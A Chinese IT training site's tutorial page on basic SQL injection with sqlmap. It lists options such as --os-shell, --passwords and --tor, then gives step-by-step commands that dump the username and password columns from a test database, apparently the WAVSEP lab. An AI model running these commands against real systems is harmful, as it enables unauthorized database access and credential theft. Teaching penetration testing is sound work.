集团主站
欢迎来到成都达内官方网站!达内—美国上市公司 亿元级外企IT培训企业!
成都it培训哪家好
成都it培训哪家好
全国服务监督电话:400-111-8989  |   联系客服   |
当前位置:主页 > 培训课程 > 网络工程 >

[成都网络工程师好找工作吗]sqlmap简单注入

发布者: 成都达内     浏览次数:     发布时间:2020-09-24 11:36:41

[成都网络工程师好找工作吗]sqlmap简单注入,一、sqlmap选项:目标:至少要选中一个参数,-u URL, --url=URL 目标为 URL ,-g GOOGLEDORK 将谷歌dork的结果作为目标url;...

  一、sqlmap选项

  目标:至少要选中一个参数

  -u URL, --url=URL 目标为 URL 

  -g GOOGLEDORK 将谷歌dork的结果作为目标url

  请求:

  这些选项可用于指定如何连接到目标URL

  --data=DATA 数据字符串通过POST发送

  --cookie=COOKIE HTTP Cookie的值

  --random-agent 随机选择 HTTP User-Agent 头的值

  --proxy=PROXY 使用代理去连接目标URL

  --tor 使用匿名网络

  --check-tor 检查Tor是否正确使用

  注入:

  这些选项可用于指定要测试哪些参数,提供自定义注入负载和可选篡改脚本

  -p TESTPARAMETER 可测试的参数

  --dbms=DBMS 将后端DBMS强制到此值

  检测:

  这些选项可用于定制检测阶段

  --level=LEVEL 执行的测试级别(1-5, 默认 1)

  --risk=RISK 执行测试的风险 (1-3, 默认 1)

  技术:

  这些选项可用于调整特定SQL注入的测试的技术

  --technique=TECH SQL注入技术选择 (默认 "BEUSTQ")

  枚举:

  T这些选项可用于枚举后端数据库管理系统的信息、结构和数据表。此外,还可以运行自己的SQL语句

  -a, --all 检索全部

  -b, --banner 检索 banner

  --current-user 检索当前用户

  --current-db 检索当前数据库

  --passwords 列出用户密码的hash值

  --tables 列出表

  --columns 列出字段

  --schema 列出DBMS schema

  --dump Dump DBMS数据库表的条目

  --dump-all Dump 所有DBMS数据库表的条目

  -D DB 指定数据库

  -T TBL 指定表

  -C COL 指定字段

  操作系统访问:

  这些选项可用于访问后端数据库管理系统底层操作系统

  --os-shell 提示为交互式操作系统shell

  --os-pwn 提示为OOB外壳,Meterpreter或VNC

  通用:

  这些选项可用于设置一些通用的工作参数

  --batch 永远不要要求用户输入,使用默认行为

  --flush-session 刷新当前目标的会话文件

  杂项:

  --sqlmap-shell 提示输入交互式sqlmap shell

  --wizard 初学者的简单向导界面

  二、sqlmap使用

  1.对url进行检测,判断是否存在SQL注入

  python sqlmap.py -u "url" --batch

  [成都网络工程师好找工作吗]sqlmap简单注入

  跑完以后发现存在注入,,参数是username 注入类型为盲注,数据库是mysql,后端语言是jsp

  2.获取数据库

  python sqlmap.py -u URL --dbs --batch 获取全部数据库

  python sqlmap.py -u URL --current-db --batch 获取当前数据库

  [成都网络工程师好找工作吗]sqlmap简单注入

  获取到了当前的数据库为 wavsepDB

  3.获取当前数据库里所有表

  python sqlmap.py -u URL -D wavsepDB --tables --batch

  [成都网络工程师好找工作吗]sqlmap简单注入

  4.获取表的字段

  python sqlmap.py -u URL -D wavsepDB -T users --columns --batch

  [成都网络工程师好找工作吗]sqlmap简单注入

  如图获取到上面字段以后,我们就开始dump字段内容了。

  5.dump字段内容

  python sqlmap.py -u URL -D wavsepDB -T users -C "password,username" --dump --batch

  如果字段内容多的话可以再加上如 --start 1 --stop 100 这样就取1-100条数据

  --dump 可以换成 --dump-all则导出全部的内容

  [成都网络工程师好找工作吗]sqlmap简单注入

(责任编辑:范老师)
最新开班
  • 成都Java培训班
    免费试听名额发放中...
  • 成都C++培训班
    免费试听名额发放中...
  • 成都PHP培训班
    免费试听名额发放中...
  • 成都网络工程培训班
    免费试听名额发放中...
  • 成都Unity3D培训班
    免费试听名额发放中...
  • 成都大数据培训班
    免费试听名额发放中...
  • 成都uid培训班
    免费试听名额发放中...
  • 成都会计培训班
    免费试听名额发放中...
  • 成都Python培训班
    免费试听名额发放中...
  • 成都嵌入式培训班
    免费试听名额发放中...
  • 成都web培训班
    免费试听名额发放中...
  • 成都软件测试培训班
    免费试听名额发放中...
在线留言
提交

校区地址:成都市锦江区东大街紫东楼端35号明宇金融广场19楼1906室

联系电话:400-111-8989

公交路线:芷泉街(18路;21路;43路;48路;104路;152路;335路 ) 地铁路线:东门大桥站(地铁2号线)

校区地址:成都市高新区奥克斯广场蜀锦路209号一楼商铺

联系电话:400-111-8989

公交路线:益州大道锦城大道口(18路;21路;43路;48路;104路;152路;335路 ) 地铁路线:孵化园(地铁1号线)

校区地址:成都锦江区东大街芷泉街229号东方广场C座3楼303

联系电话:400-111-8989

公交路线:芷泉街(188路;115路;515路;236路;505路;501路;84路 ) 地铁路线:东门大桥站(地铁2号线)

校区地址:成都市武侯区佳灵路3号红牌楼广场2号写字楼11楼1115号

联系电话:400-111-8989

公交路线:红牌楼东(11路;92路;100路;111路;139路;g28路;快速公交K1/K2) 地铁路线:红牌楼站(地铁3号线)

校区地址:成都市锦江区红星路二段70号四川日报大厦502-2

联系电话:400-111-8989

公交路线:市二医院站(6路;49路;102路;5路;37路;g92路;) 地铁路线:地铁市二医院(地铁3号线)

校区地址:成都市锦江区东大街芷泉段229号东方广场C座16层

联系电话:400-111-8989

公交路线:芷泉街(18路;21路;43路;48路;104路;152路;335路 ) 地铁路线:东门大桥站(地铁2号线)

校区地址:四川省成都市武侯区高新科技孵化园9号园区E座7楼

联系电话:400-111-8989

公交路线:益州大道锦城大道口(18路;21路;43路;48路;104路;152路;335路 ) 地铁路线:孵化园(地铁1号线)

了解达内动态
关注成都达内教育公众号

首页 | 关于达内 | 课程中心 | 专家师资 | 视频教程 | 学员空间 | 校企合作 | 新闻资讯 | 就业指导 | 网站地图

2016-2025 达内时代科技集团有限公司 版权所有 京ICP证8000853号-56 蜀ICP备18021046号-3